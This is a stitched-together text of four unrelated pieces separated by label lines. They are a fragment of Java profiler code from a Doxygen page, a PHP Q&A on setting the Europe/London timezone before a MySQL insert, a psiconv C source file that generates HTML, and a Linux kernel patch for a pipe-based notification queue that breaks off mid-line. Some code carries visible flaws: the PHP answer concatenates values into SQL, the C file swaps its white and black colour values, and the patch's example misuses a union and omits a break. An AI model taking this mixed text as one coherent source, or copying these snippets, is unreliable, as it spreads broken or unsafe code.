timingData.methodEntryExitCallTime0) * 1000000 / timingData // .timerCountsInSecond0); if (time < 0) { //System.out.println("*** Negative: " + thisNode.totalTime0 + ", thisNCalls = " + thisNode.nCalls + ", fromNCalls = " + totalNCallsFromThisNode); time = 0; } setTotalTime0ForNodeOfs(dataOfs, time); if (collectingTwoTimeStamps) { // Calculate cleansed self time time = (long) timingAdjuster.adjustTime(rtNode.getNetTime1(), rtNode.getNCalls(), nCallsFromThisNode, true); // time = (long) (((double) rtNode.getNetTime1() // - rtNode.getNCalls() * timingData.methodEntryExitInnerTime1 // - nCallsFromThisNode * timingData.methodEntryExitOuterTime1) * 1000000 / timingData // .timerCountsInSecond1); if (time < 0) { time = 0; } setSelfTime1ForNodeOfs(dataOfs, time); thisNodeTotalTime1InTimerUnits += rtNode.getNetTime1(); childTotalTime1InTimerUnits = thisNodeTotalTime1InTimerUnits; // It will be effectively returned by this method // Calculate cleansed total time time = (long) timingAdjuster.adjustTime(thisNodeTotalTime1InTimerUnits, rtNode.getNCalls(), totalNCallsFromThisNode, true); // time = (long) (((double) thisNodeTotalTime1InTimerUnits - rtNode.getNCalls() * timingData.methodEntryExitInnerTime0 // - totalNCallsFromThisNode * timingData.methodEntryExitCallTime1) * 1000000 / timingData // .timerCountsInSecond1); if (time < 0) { time = 0; } setTotalTime1ForNodeOfs(dataOfs, time); } childTotalNCalls = totalNCallsFromThisNode + rtNode.getNCalls(); // It will be effectively returned by this method return nextNodeOfs; } private void generateNodeBase(TimedCPUCCTNode rtNode, int nodeDataOfs) { int methodId = (rtNode instanceof MethodCPUCCTNode) ? ((MethodCPUCCTNode) rtNode).getMethodId() : 0; int nCalls = rtNode.getNCalls(); int nChildren = (rtNode.getChildren() != null) ? rtNode.getChildren().size() : 0; setMethodIdForNodeOfs(nodeDataOfs, methodId); setNCallsForNodeOfs(nodeDataOfs, nCalls); setNChildrenForNodeOfs(nodeDataOfs, nChildren); } private void mergeBySelfTime(PrestimeCPUCCTNodeFree curNode, int sourceNodeDataOfs) { curNode.addNCalls(getNCallsForNodeOfs(sourceNodeDataOfs)); curNode.addTotalTime0(getSelfTime0ForNodeOfs(sourceNodeDataOfs)); if (collectingTwoTimeStamps) { curNode.addTotalTime1(getSelfTime1ForNodeOfs(sourceNodeDataOfs)); } curNode.addWaitTime0(getWaitTime0ForNodeOfs(sourceNodeDataOfs)); curNode.addSleepTime0(getSleepTime0ForNodeOfs(sourceNodeDataOfs)); } private void subtractNodeDataBySelfTime(PrestimeCPUCCTNodeFree curNode, int sourceNodeDataOfs) { curNode.addNCalls(-getNCallsForNodeOfs(sourceNodeDataOfs)); curNode.addTotalTime0(-getSelfTime0ForNodeOfs(sourceNodeDataOfs)); if (collectingTwoTimeStamps) { curNode.addTotalTime1(-getSelfTime1ForNodeOfs(sourceNodeDataOfs)); } curNode.addWaitTime0(-getWaitTime0ForNodeOfs(sourceNodeDataOfs)); // TODO: [wait] what is this? curNode.addSleepTime0(-getSleepTime0ForNodeOfs(sourceNodeDataOfs)); // TODO: [wait] what is this? } } Generated by  Doxygen 1.6.0   Back to index
__label__pos
0.995242
bob jomes bob jomes - 1 year ago 84 PHP Question Set timezone as Europe/London I'm using PHP to insert a query into a database. I am using timestamp for each query, however currently it is returning a time which is 7 hours behind my timezone (Europe/London). How do I set the timezone as Europe/London when I insert it into a MYSQL database? Answer Source Try the code below: (I have written the code in PDO as you did not specify which extension you were using.) <?php date_default_timezone_set('Europe/London'); $time_stamp = date('Y-m-d H:i:s'); $stmt = $con->prepare("INSERT INTO tablename (datetime) VALUES ('".$time_stamp."')"); $stmt->execute(); ?> Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download
__label__pos
0.954181
/[public]/psiconv/trunk/program/psiconv/gen_html.c ViewVC logotype Contents of /psiconv/trunk/program/psiconv/gen_html.c Parent Directory Parent Directory | Revision Log Revision Log Revision 142 - (show annotations) Tue Jan 29 18:38:38 2002 UTC (17 years, 9 months ago) by frodo File MIME type: text/plain File size: 13417 byte(s) (Frodo) DMALLOC support 1 /* 2 gen_html.c - Part of psiconv, a PSION 5 file formats converter 3 Copyright (c) 1999 Frodo Looijaard <[email protected]> 4 5 This program is free software; you can redistribute it and/or modify 6 it under the terms of the GNU General Public License as published by 7 the Free Software Foundation; either version 2 of the License, or 8 (at your option) any later version. 9 10 This program is distributed in the hope that it will be useful, 11 but WITHOUT ANY WARRANTY; without even the implied warranty of 12 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 GNU General Public License for more details. 14 15 You should have received a copy of the GNU General Public License 16 along with this program; if not, write to the Free Software 17 Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 18 */ 19 20 #include "config.h" 21 #include <stdio.h> 22 #include <string.h> 23 #include <stdlib.h> 24 #include "psiconv/data.h" 25 #include "psiconv/list.h" 26 #include "gen.h" 27 #include "psiconv.h" 28 29 #ifdef DMALLOC 30 #include "dmalloc.h" 31 #endif 32 33 /* This determines for each character how it is displayed */ 34 static const char *char_table[0x100] = 35 { 36 /* 0x00 */ "" ,"" ,"" ,"" ,"" ,"" ,"<P> ","<BR>" , 37 /* 0x08 */ "<P>" ," " ,"" ,"" ,"" ,"" ,"" ,"" , 38 /* 0x10 */ " " ,"" ,"" ,"" ,"" ,"" ,"" ,"" , 39 /* 0x18 */ "" ,"" ,"" ,"" ,"" ,"" ,"" ,"" , 40 /* 0x20 */ " " ,"!" ,"&quot;","#" ,"$" ,"%" ,"&amp;","'" , 41 /* 0x28 */ "(" ,")" ,"*" ,"+" ,"," ,"-" ,"." ,"/" , 42 /* 0x30 */ "0" ,"1" ,"2" ,"3" ,"4" ,"5" ,"6" ,"7" , 43 /* 0x38 */ "8" ,"9" ,":" ,";" ,"&lt;" ,"=" ,"&gt;" ,"?" , 44 /* 0x40 */ "@" ,"A" ,"B" ,"C" ,"D" ,"E" ,"F" ,"G" , 45 /* 0x48 */ "H" ,"I" ,"J" ,"K" ,"L" ,"M" ,"N" ,"O" , 46 /* 0x50 */ "P" ,"Q" ,"R" ,"S" ,"T" ,"U" ,"V" ,"W" , 47 /* 0x58 */ "X" ,"Y" ,"Z" ,"[" ,"\\" ,"]" ,"^" ,"_" , 48 /* 0x60 */ "`" ,"a" ,"b" ,"c" ,"d" ,"e" ,"f" ,"g" , 49 /* 0x68 */ "h" ,"i" ,"j" ,"k" ,"l" ,"m" ,"n" ,"o" , 50 /* 0x70 */ "p" ,"q" ,"r" ,"s" ,"t" ,"u" ,"v" ,"w" , 51 /* 0x78 */ "x" ,"y" ,"z" ,"{" ,"|" ,"}" ,"~" ,"" , 52 /* 0x80 */ "" ,"","&sbquot;","&fnof;","&bdquo;","&hellip;", 53 "&dagger;","&Dagger;", 54 /* 0x88 */ "^","&permil;","&Scaron;","&lang;","&OElig;","" ,"" ,"" , 55 /* 0x90 */ "","&lsquo;","&rsquo;","&ldquo;","&rdquo;", 56 "&middot;","&ndash","&mdash", 57 /* 0x98 */ "&tilde;","&trade;","&scaron;","&rang;","&oelig;","","","&Yuml;", 58 /* 0xa0 */ "","&iexcl;","&cent;","&pound;", 59 "&curren;","&yen;","&brvbar;","&sect", 60 /* 0xa8 */ "&quot;","&copy;","a","&laquo;","&not;","-","&reg;","&macron;", 61 /* 0xb0 */ "&deg;","&plusmn;","&sup2;","&sup3;", 62 "&rsquot;","&micron;","&para;","&middot;", 63 /* 0xb8 */ "&comma;","&sup1","&deg;","&raquo;", 64 "&frac14;","&frac12;","&frac34;","&iquest;", 65 /* 0xc0 */ "&Agrave;","&Aacute;","&Acirc;","&Atilde;", 66 "&Auml;","&Aring;","&AElig;","&Ccedil;", 67 /* 0xc8 */ "&Egrave;","&Eacute;","&Ecirc;","&Euml;", 68 "&Igrave;","&Iacute;","&Icirc;","&Iuml;", 69 /* 0xd0 */ "&ETH;","&Ntilde;","&Ograve;","&Oacute;", 70 "&Ocirc;","&Otilde;","&Ouml;","&times;", 71 /* 0xd8 */ "&Oslash;","&Ugrave;","&Uacute;","&Ucirc;", 72 "&Uuml;","&Yacute;","&THORN;","&szlig;", 73 /* 0xe0 */ "&agrave;","&aacute;","&acirc;","&atilde;", 74 "&auml;","&aring;","&aelig;","&ccedil;", 75 /* 0xe8 */ "&egrave;","&eacute;","&ecirc;","&euml;", 76 "&igrave;","&iacute;","&icirc;","&iuml;", 77 /* 0xf0 */ "&eth;","&ntilde;","&ograve;","&oacute;", 78 "&ocirc;","&otilde;","&ouml;","&divide;", 79 /* 0xf8 */ "&oslash;","&ugrave;","&uacute;","&ucirc;", 80 "&uuml;","&yacute;","&thorn;","&yuml;" 81 }; 82 83 static psiconv_character_layout gen_base_char(const psiconv_font font, 84 const psiconv_color color, 85 const psiconv_color back_color); 86 static void diff_char(FILE *of, const psiconv_character_layout old, 87 const psiconv_character_layout new, int *flags); 88 static void gen_para(FILE *of, const psiconv_paragraph para, 89 const psiconv_character_layout base_char); 90 91 static void psiconv_gen_html_word(FILE *of,psiconv_word_f wf); 92 static void psiconv_gen_html_texted(FILE *of,psiconv_texted_f tf); 93 94 /* This is not necessarily the same as returned by basic_character_layout_status 95 This one is specific for the base point of HTML */ 96 psiconv_character_layout gen_base_char(const psiconv_font font, 97 const psiconv_color color, 98 const psiconv_color back_color) 99 { 100 struct psiconv_character_layout_s base_char_struct = 101 { 102 NULL, /* color */ 103 NULL, /* back_color */ 104 13.0, /* font_size */ 105 psiconv_bool_false, /* italic */ 106 psiconv_bool_false, /* bold */ 107 psiconv_normalscript, /* super_sub */ 108 psiconv_bool_false, /* underline */ 109 psiconv_bool_false, /* strikethrough */ 110 NULL, /* font */ 111 }; 112 base_char_struct.color = color; 113 base_char_struct.back_color = back_color; 114 base_char_struct.font = font; 115 return psiconv_clone_character_layout(&base_char_struct); 116 } 117 118 /* flags & 1: 0 if no <FONT> was yet generated. 119 flags & 2: 1 if at end-of-paragraph 120 */ 121 void diff_char(FILE *of, const psiconv_character_layout old, 122 const psiconv_character_layout new, 123 int *flags) 124 { 125 int font_set = 0; 126 127 if ((old->font_size != new->font_size) || 128 (old->color->red != new->color->red) || 129 (old->color->green != new->color->green) || 130 (old->color->blue != new->color->blue) || 131 (strcmp(old->font->name,new->font->name)) || 132 (old->font->screenfont != new->font->screenfont) || 133 ((*flags & 0x03) == 3)) { 134 if (old->italic) 135 fputs("</I>",of); 136 if (old->bold) 137 fputs("</B>",of); 138 if (old->underline) 139 fputs("</U>",of); 140 if (old->strikethrough) 141 fputs("</STRIKE>",of); 142 if (old->super_sub == psiconv_superscript) 143 fputs("</SUP>",of); 144 if (old->super_sub == psiconv_subscript) 145 fputs("</SUB>",of); 146 if ((*flags & 1) == 1) 147 fputs("</FONT>",of); 148 if ((*flags & 2) == 0) { 149 *flags |= 1; 150 fputs("<FONT SIZE=",of); 151 if (new->font_size <= 8.0) 152 fputs("1",of); 153 else if (new->font_size <= 10.0) 154 fputs("2",of); 155 else if (new->font_size <= 12.0) 156 fputs("3",of); 157 else if (new->font_size <= 14.0) 158 fputs("4",of); 159 else if (new->font_size <= 18.0) 160 fputs("5",of); 161 else if (new->font_size <= 24.0) 162 fputs("6",of); 163 else 164 fputs("7",of); 165 fprintf(of," COLOR=#%02x%02x%02x",new->color->red,new->color->green, 166 new->color->blue); 167 if (new->font->screenfont == psiconv_font_sansserif) 168 fprintf(of," FACE=\"%s, Sans-Serif\">",new->font->name); 169 else if (new->font->screenfont == psiconv_font_nonprop) 170 fprintf(of," FACE=\"%s, Monospace\">",new->font-> name); 171 else if (new->font->screenfont == psiconv_font_serif) 172 fprintf(of," FACE=\"%s, Serif\">",new->font-> name); 173 else 174 fprintf(of," FACE=\"%s, Serif\">",new->font-> name); 175 } 176 if (new->italic) 177 fputs("<I>",of); 178 if (new->bold) 179 fputs("<B>",of); 180 if (new->underline) 181 fputs("<U>",of); 182 if (new->strikethrough) 183 fputs("<STRIKE>",of); 184 if (new->super_sub == psiconv_superscript) 185 fputs("<SUP>",of); 186 if (new->super_sub == psiconv_subscript) 187 fputs("<SUB>",of); 188 } else { 189 if (font_set || (old->italic != new->italic)) { 190 if (old->italic) 191 fputs("</I>",of); 192 else 193 fputs("<I>",of); 194 } 195 if (old->bold != new->bold) { 196 if (old->bold) 197 fputs("</B>",of); 198 else 199 fputs("<B>",of); 200 } 201 if (old->underline != new->underline) { 202 if (old->underline) 203 fputs("</U>",of); 204 else 205 fputs("<U>",of); 206 } 207 if (old->strikethrough != new->strikethrough) { 208 if (old->strikethrough) 209 fputs("</STRIKE>",of); 210 else 211 fputs("<STRIKE>",of); 212 } 213 if (old->super_sub != new->super_sub) { 214 if (old->super_sub == psiconv_superscript) 215 fputs("</SUP>",of); 216 else if (old->super_sub == psiconv_subscript) 217 fputs("</SUB>",of); 218 if (new->super_sub == psiconv_superscript) 219 fputs("<SUP>",of); 220 else if (new->super_sub == psiconv_subscript) 221 fputs("<SUB>",of); 222 } 223 } 224 } 225 226 void gen_para(FILE *of, const psiconv_paragraph para, 227 const psiconv_character_layout base_char) 228 { 229 int i,j,loc; 230 psiconv_character_layout cur_char; 231 psiconv_in_line_layout inl; 232 int flags = 0; 233 234 235 fputs("<P",of); 236 if (para->base_paragraph->justify_hor == psiconv_justify_left) 237 fputs(" ALIGN=left",of); 238 else if (para->base_paragraph->justify_hor == psiconv_justify_right) 239 fputs(" ALIGN=right",of); 240 else if (para->base_paragraph->justify_hor == psiconv_justify_centre) 241 fputs(" ALIGN=center",of); 242 else if (para->base_paragraph->justify_hor == psiconv_justify_full) 243 fputs(" ALIGN=left",of); 244 fputs(">",of); 245 if (para->base_paragraph->bullet->on) 246 fputs("<UL><LI>",of); 247 248 cur_char = base_char; 249 250 if (psiconv_list_length(para->in_lines) == 0) { 251 diff_char(of,cur_char,para->base_character,&flags); 252 cur_char = para->base_character; 253 } 254 loc = 0; 255 256 for (i = 0; i < psiconv_list_length(para->in_lines); i++) { 257 inl = psiconv_list_get(para->in_lines,i); 258 diff_char(of,cur_char,inl->layout,&flags); 259 cur_char = inl->layout; 260 for (j = loc; j < inl->length + loc; j ++) { 261 fputs(char_table[(unsigned char) (para->text[j])],of); 262 } 263 loc = j; 264 } 265 266 if (loc < strlen(para->text)) { 267 diff_char(of,cur_char,para->base_character,&flags); 268 cur_char = para->base_character; 269 for (j = loc; j < strlen(para->text); j ++) { 270 fputs(char_table[(unsigned char) (para->text[j])],of); 271 } 272 } 273 274 if (strlen(para->text) == 0) 275 fputs("<BR>",of); 276 277 flags |= 2; 278 diff_char(of,cur_char,base_char,&flags); 279 280 if (para->base_paragraph->bullet->on) 281 fputs("</UL>",of); 282 283 fputs("</P>\n",of); 284 } 285 286 int psiconv_gen_html(const char * filename,const psiconv_file file, 287 const char *dest) 288 { 289 FILE *of = fopen(filename,"w"); 290 if (! of) 291 return -1; 292 293 if (file->type == psiconv_word_file) { 294 psiconv_gen_html_word(of,(psiconv_word_f) file->file); 295 } else if (file->type == psiconv_texted_file) { 296 psiconv_gen_html_texted(of,(psiconv_texted_f) file->file); 297 } else { 298 fclose(of); 299 return -1; 300 } 301 return fclose(of); 302 } 303 304 void psiconv_gen_html_texted(FILE *of,psiconv_texted_f tf) 305 { 306 psiconv_character_layout base_char; 307 psiconv_paragraph para; 308 int i; 309 310 /* We have nothing better */ 311 base_char = psiconv_basic_character_layout(); 312 313 fputs("<!doctype html public \"-//W3C//DTD HTML 3.2 Final//EN\">", of); 314 fputs("\n<HTML>\n<HEAD>\n <META NAME=\"GENERATOR\"", of); 315 fputs(" CONTENT=\"psiconv-" VERSION "\">\n", of); 316 fputs("<BODY>\n",of); 317 for (i = 0; i < psiconv_list_length(tf->texted_sec->paragraphs); i++) { 318 para = psiconv_list_get(tf->texted_sec->paragraphs,i); 319 gen_para(of,para,base_char); 320 } 321 fputs("</BODY>\n</HTML>\n",of); 322 psiconv_free_character_layout(base_char); 323 } 324 325 326 void psiconv_gen_html_word(FILE *of,psiconv_word_f wf) 327 { 328 int i; 329 psiconv_paragraph para; 330 psiconv_color white,black; 331 psiconv_character_layout base_char; 332 333 white = malloc(sizeof(*white)); 334 black = malloc(sizeof(*black)); 335 white->red = 0x00; 336 white->green = 0x00; 337 white->blue = 0x00; 338 black->red = 0xff; 339 black->green = 0xff; 340 black->blue = 0xff; 341 342 /* To keep from generating a font desc for each line */ 343 base_char = gen_base_char(wf->styles_sec->normal->character->font, 344 black,white); 345 346 psiconv_free_color(black); 347 psiconv_free_color(white); 348 349 fputs("<!doctype html public \"-//W3C//DTD HTML 3.2 Final//EN\">", of); 350 fputs("\n<HTML>\n<HEAD>\n <META NAME=\"GENERATOR\"", of); 351 fputs(" CONTENT=\"psiconv-" VERSION "\">\n", of); 352 fputs("<BODY>\n",of); 353 354 for (i = 0; i < psiconv_list_length(wf->paragraphs); i++) { 355 para = psiconv_list_get(wf->paragraphs,i); 356 gen_para(of,para,base_char); 357 } 358 fputs("</BODY>\n</HTML>\n",of); 359 psiconv_free_character_layout(base_char); 360 } 361 362 static struct psiconv_fileformat_s ff = 363 { 364 "HTML3", 365 "HTML 3.2, not verified so probably not completely compliant", 366 &psiconv_gen_html 367 }; 368 369 void init_html(void) 370 { 371 psiconv_list_add(fileformat_list,&ff); 372 } [email protected] ViewVC Help Powered by ViewVC 1.1.26  
__label__pos
0.886177
[PATCH 05/17] pipe: Add general notification queue support [ver #5] David Howells dhowells at redhat.com Wed Mar 18 15:03:58 UTC 2020 Make it possible to have a general notification queue built on top of a standard pipe. Notifications are 'spliced' into the pipe and then read out. splice(), vmsplice() and sendfile() are forbidden on pipes used for notifications as post_one_notification() cannot take pipe->mutex. This means that notifications could be posted in between individual pipe buffers, making iov_iter_revert() difficult to effect. The way the notification queue is used is: (1) An application opens a pipe with a special flag and indicates the number of messages it wishes to be able to queue at once (this can only be set once): pipe2(fds, O_NOTIFICATION_PIPE); ioctl(fds[0], IOC_WATCH_QUEUE_SET_SIZE, queue_depth); (2) The application then uses poll() and read() as normal to extract data from the pipe. read() will return multiple notifications if the buffer is big enough, but it will not split a notification across buffers - rather it will return a short read or EMSGSIZE. Notification messages include a length in the header so that the caller can split them up. Each message has a header that describes it: struct watch_notification { __u32 type:24; __u32 subtype:8; __u32 info; }; The type indicates the source (eg. mount tree changes, superblock events, keyring changes, block layer events) and the subtype indicates the event type (eg. mount, unmount; EIO, EDQUOT; link, unlink). The info field indicates a number of things, including the entry length, an ID assigned to a watchpoint contributing to this buffer and type-specific flags. Supplementary data, such as the key ID that generated an event, can be attached in additional slots. The maximum message size is 127 bytes. Messages may not be padded or aligned, so there is no guarantee, for example, that the notification type will be on a 4-byte bounary. Signed-off-by: David Howells <dhowells at redhat.com> --- Documentation/userspace-api/ioctl/ioctl-number.rst | 1 Documentation/watch_queue.rst | 339 ++++++++++ fs/pipe.c | 206 ++++-- fs/splice.c | 12 include/linux/pipe_fs_i.h | 19 + include/linux/watch_queue.h | 127 ++++ include/uapi/linux/watch_queue.h | 20 + init/Kconfig | 12 kernel/Makefile | 1 kernel/watch_queue.c | 657 ++++++++++++++++++++ 10 files changed, 1318 insertions(+), 76 deletions(-) create mode 100644 Documentation/watch_queue.rst create mode 100644 include/linux/watch_queue.h create mode 100644 kernel/watch_queue.c diff --git a/Documentation/userspace-api/ioctl/ioctl-number.rst b/Documentation/userspace-api/ioctl/ioctl-number.rst index 2e91370dc159..cdf8551d70d7 100644 --- a/Documentation/userspace-api/ioctl/ioctl-number.rst +++ b/Documentation/userspace-api/ioctl/ioctl-number.rst @@ -201,6 +201,7 @@ Code Seq# Include File Comments 'W' 00-1F linux/wanrouter.h conflict! (pre 3.9) 'W' 00-3F sound/asound.h conflict! 'W' 40-5F drivers/pci/switch/switchtec.c +'W' 60-61 linux/watch_queue.h 'X' all fs/xfs/xfs_fs.h, conflict! fs/xfs/linux-2.6/xfs_ioctl32.h, include/linux/falloc.h, diff --git a/Documentation/watch_queue.rst b/Documentation/watch_queue.rst new file mode 100644 index 000000000000..849fad6893ef --- /dev/null +++ b/Documentation/watch_queue.rst @@ -0,0 +1,339 @@ +============================== +General notification mechanism +============================== + +The general notification mechanism is built on top of the standard pipe driver +whereby it effectively splices notification messages from the kernel into pipes +opened by userspace. This can be used in conjunction with:: + + * Key/keyring notifications + + +The notifications buffers can be enabled by: + + "General setup"/"General notification queue" + (CONFIG_WATCH_QUEUE) + +This document has the following sections: + +.. contents:: :local: + + +Overview +======== + +This facility appears as a pipe that is opened in a special mode. The pipe's +internal ring buffer is used to hold messages that are generated by the kernel. +These messages are then read out by read(). Splice and similar are disabled on +such pipes due to them wanting to, under some circumstances, revert their +additions to the ring - which might end up interleaved with notification +messages. + +The owner of the pipe has to tell the kernel which sources it would like to +watch through that pipe. Only sources that have been connected to a pipe will +insert messages into it. Note that a source may be bound to multiple pipes and +insert messages into all of them simultaneously. + +Filters may also be emplaced on a pipe so that certain source types and +subevents can be ignored if they're not of interest. + +A message will be discarded if there isn't a slot available in the ring or if +no preallocated message buffer is available. In both of these cases, read() +will insert a WATCH_META_LOSS_NOTIFICATION message into the output buffer after +the last message currently in the buffer has been read. + +Note that when producing a notification, the kernel does not wait for the +consumers to collect it, but rather just continues on. This means that +notifications can be generated whilst spinlocks are held and also protects the +kernel from being held up indefinitely by a userspace malfunction. + + +Message Structure +================= + +Notification messages begin with a short header:: + + struct watch_notification { + __u32 type:24; + __u32 subtype:8; + __u32 info; + }; + +"type" indicates the source of the notification record and "subtype" indicates +the type of record from that source (see the Watch Sources section below). The +type may also be "WATCH_TYPE_META". This is a special record type generated +internally by the watch queue itself. There are two subtypes: + + * WATCH_META_REMOVAL_NOTIFICATION + * WATCH_META_LOSS_NOTIFICATION + +The first indicates that an object on which a watch was installed was removed +or destroyed and the second indicates that some messages have been lost. + +"info" indicates a bunch of things, including: + + * The length of the message in bytes, including the header (mask with + WATCH_INFO_LENGTH and shift by WATCH_INFO_LENGTH__SHIFT). This indicates + the size of the record, which may be between 8 and 127 bytes. + + * The watch ID (mask with WATCH_INFO_ID and shift by WATCH_INFO_ID__SHIFT). + This indicates that caller's ID of the watch, which may be between 0 + and 255. Multiple watches may share a queue, and this provides a means to + distinguish them. + + * A type-specific field (WATCH_INFO_TYPE_INFO). This is set by the + notification producer to indicate some meaning specific to the type and + subtype. + +Everything in info apart from the length can be used for filtering. + +The header can be followed by supplementary information. The format of this is +at the discretion is defined by the type and subtype. + + +Watch List (Notification Source) API +==================================== + +A "watch list" is a list of watchers that are subscribed to a source of +notifications. A list may be attached to an object (say a key or a superblock) +or may be global (say for device events). From a userspace perspective, a +non-global watch list is typically referred to by reference to the object it +belongs to (such as using KEYCTL_NOTIFY and giving it a key serial number to +watch that specific key). + +To manage a watch list, the following functions are provided: + + * ``void init_watch_list(struct watch_list *wlist, + void (*release_watch)(struct watch *wlist));`` + + Initialise a watch list. If ``release_watch`` is not NULL, then this + indicates a function that should be called when the watch_list object is + destroyed to discard any references the watch list holds on the watched + object. + + * ``void remove_watch_list(struct watch_list *wlist);`` + + This removes all of the watches subscribed to a watch_list and frees them + and then destroys the watch_list object itself. + + +Watch Queue (Notification Output) API +===================================== + +A "watch queue" is the buffer allocated by an application that notification +records will be written into. The workings of this are hidden entirely inside +of the pipe device driver, but it is necessary to gain a reference to it to set +a watch. These can be managed with: + + * ``struct watch_queue *get_watch_queue(int fd);`` + + Since watch queues are indicated to the kernel by the fd of the pipe that + implements the buffer, userspace must hand that fd through a system call. + This can be used to look up an opaque pointer to the watch queue from the + system call. + + * ``void put_watch_queue(struct watch_queue *wqueue);`` + + This discards the reference obtained from ``get_watch_queue()``. + + +Watch Subscription API +====================== + +A "watch" is a subscription on a watch list, indicating the watch queue, and +thus the buffer, into which notification records should be written. The watch +queue object may also carry filtering rules for that object, as set by +userspace. Some parts of the watch struct can be set by the driver:: + + struct watch { + union { + u32 info_id; /* ID to be OR'd in to info field */ + ... + }; + void *private; /* Private data for the watched object */ + u64 id; /* Internal identifier */ + ... + }; + +The ``info_id`` value should be an 8-bit number obtained from userspace and +shifted by WATCH_INFO_ID__SHIFT. This is OR'd into the WATCH_INFO_ID field of +struct watch_notification::info when and if the notification is written into +the associated watch queue buffer. + +The ``private`` field is the driver's data associated with the watch_list and +is cleaned up by the ``watch_list::release_watch()`` method. + +The ``id`` field is the source's ID. Notifications that are posted with a +different ID are ignored. + +The following functions are provided to manage watches: + + * ``void init_watch(struct watch *watch, struct watch_queue *wqueue);`` + + Initialise a watch object, setting its pointer to the watch queue, using + appropriate barriering to avoid lockdep complaints. + + * ``int add_watch_to_object(struct watch *watch, struct watch_list *wlist);`` + + Subscribe a watch to a watch list (notification source). The + driver-settable fields in the watch struct must have been set before this + is called. + + * ``int remove_watch_from_object(struct watch_list *wlist, + struct watch_queue *wqueue, + u64 id, false);`` + + Remove a watch from a watch list, where the watch must match the specified + watch queue (``wqueue``) and object identifier (``id``). A notification + (``WATCH_META_REMOVAL_NOTIFICATION``) is sent to the watch queue to + indicate that the watch got removed. + + * ``int remove_watch_from_object(struct watch_list *wlist, NULL, 0, true);`` + + Remove all the watches from a watch list. It is expected that this will be + called preparatory to destruction and that the watch list will be + inaccessible to new watches by this point. A notification + (``WATCH_META_REMOVAL_NOTIFICATION``) is sent to the watch queue of each + subscribed watch to indicate that the watch got removed. + + +Notification Posting API +======================== + +To post a notification to watch list so that the subscribed watches can see it, +the following function should be used:: + + void post_watch_notification(struct watch_list *wlist, + struct watch_notification *n, + const struct cred *cred, + u64 id); + +The notification should be preformatted and a pointer to the header (``n``) +should be passed in. The notification may be larger than this and the size in +units of buffer slots is noted in ``n->info & WATCH_INFO_LENGTH``. + +The ``cred`` struct indicates the credentials of the source (subject) and is +passed to the LSMs, such as SELinux, to allow or suppress the recording of the +note in each individual queue according to the credentials of that queue +(object). + +The ``id`` is the ID of the source object (such as the serial number on a key). +Only watches that have the same ID set in them will see this notification. + + +Watch Sources +============= + +Any particular buffer can be fed from multiple sources. Sources include: + + * WATCH_TYPE_KEY_NOTIFY + + Notifications of this type indicate changes to keys and keyrings, including + the changes of keyring contents or the attributes of keys. + + See Documentation/security/keys/core.rst for more information. + + +Event Filtering +=============== + +Once a watch queue has been created, a set of filters can be applied to limit +the events that are received using:: + + struct watch_notification_filter filter = { + ... + }; + ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter) + +The filter description is a variable of type:: + + struct watch_notification_filter { + __u32 nr_filters; + __u32 __reserved; + struct watch_notification_type_filter filters[]; + }; + +Where "nr_filters" is the number of filters in filters[] and "__reserved" +should be 0. The "filters" array has elements of the following type:: + + struct watch_notification_type_filter { + __u32 type; + __u32 info_filter; + __u32 info_mask; + __u32 subtype_filter[8]; + }; + +Where: + + * ``type`` is the event type to filter for and should be something like + "WATCH_TYPE_KEY_NOTIFY" + + * ``info_filter`` and ``info_mask`` act as a filter on the info field of the + notification record. The notification is only written into the buffer if:: + + (watch.info & info_mask) == info_filter + + This could be used, for example, to ignore events that are not exactly on + the watched point in a mount tree. + + * ``subtype_filter`` is a bitmask indicating the subtypes that are of + interest. Bit 0 of subtype_filter[0] corresponds to subtype 0, bit 1 to + subtype 1, and so on. + +If the argument to the ioctl() is NULL, then the filters will be removed and +all events from the watched sources will come through. + + +Userspace Code Example +====================== + +A buffer is created with something like the following:: + + pipe2(fds, O_TMPFILE); + ioctl(fds[1], IOC_WATCH_QUEUE_SET_SIZE, 256); + +It can then be set to receive keyring change notifications:: + + keyctl(KEYCTL_WATCH_KEY, KEY_SPEC_SESSION_KEYRING, fds[1], 0x01); + +The notifications can then be consumed by something like the following:: + + static void consumer(int rfd, struct watch_queue_buffer *buf) + { + unsigned char buffer[128]; + ssize_t buf_len; + + while (buf_len = read(rfd, buffer, sizeof(buffer)), + buf_len > 0 + ) { + void *p = buffer; + void *end = buffer + buf_len; + while (p < end) { + union { + struct watch_notification n; + unsigned char buf1[128]; + } n; + size_t largest, len; + + largest = end - p; + if (largest > 128) + largest = 128; + memcpy(&n, p, largest); + + len = (n->info & WATCH_INFO_LENGTH) >> + WATCH_INFO_LENGTH__SHIFT; + if (len == 0 || len > largest) + return; + + switch (n.n.type) { + case WATCH_TYPE_META: + got_meta(&n.n); + case WATCH_TYPE_KEY_NOTIFY: + saw_key_change(&n.n); + break; + } + + p += len; + } + } + } diff --git a/fs/pipe.c b/fs/pipe.c index 2144507447c5..4d86274f9a6e 100644 --- a/fs/pipe.c +++ b/fs/pipe.c @@ -24,6 +24,7 @@ #include <linux/syscalls.h> #include <linux/fcntl.h> #include <linux/memcontrol.h> +#include <linux/watch_queue.h> #include <linux/uaccess.h> #include <asm/ioctls.h> @@ -459,6 +460,13 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from) goto out; } +#ifdef CONFIG_WATCH_QUEUE + if (pipe->watch_queue) { + ret = -EXDEV; + goto out; + } +#endif + /* * Only wake up if the pipe started out empty, since * otherwise there should be no readers waiting. @@ -628,22 +636,37 @@ static long pipe_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) int count, head, tail, mask; switch (cmd) { - case FIONREAD: - __pipe_lock(pipe); - count = 0; - head = pipe->head; - tail = pipe->tail; - mask = pipe->ring_size - 1; + case FIONREAD: + __pipe_lock(pipe); + count = 0; + head = pipe->head; + tail = pipe->tail; + mask = pipe->ring_size - 1; - while (tail != head) { - count += pipe->bufs[tail & mask].len; - tail++; - } - __pipe_unlock(pipe); + while (tail != head) { + count += pipe->bufs[tail & mask].len; + tail++; + } + __pipe_unlock(pipe); - return put_user(count, (int __user *)arg); - default: - return -ENOIOCTLCMD; + return put_user(count, (int __user *)arg); + +#ifdef CONFIG_WATCH_QUEUE + case IOC_WATCH_QUEUE_SET_SIZE: { + int ret; + __pipe_lock(pipe); + ret = 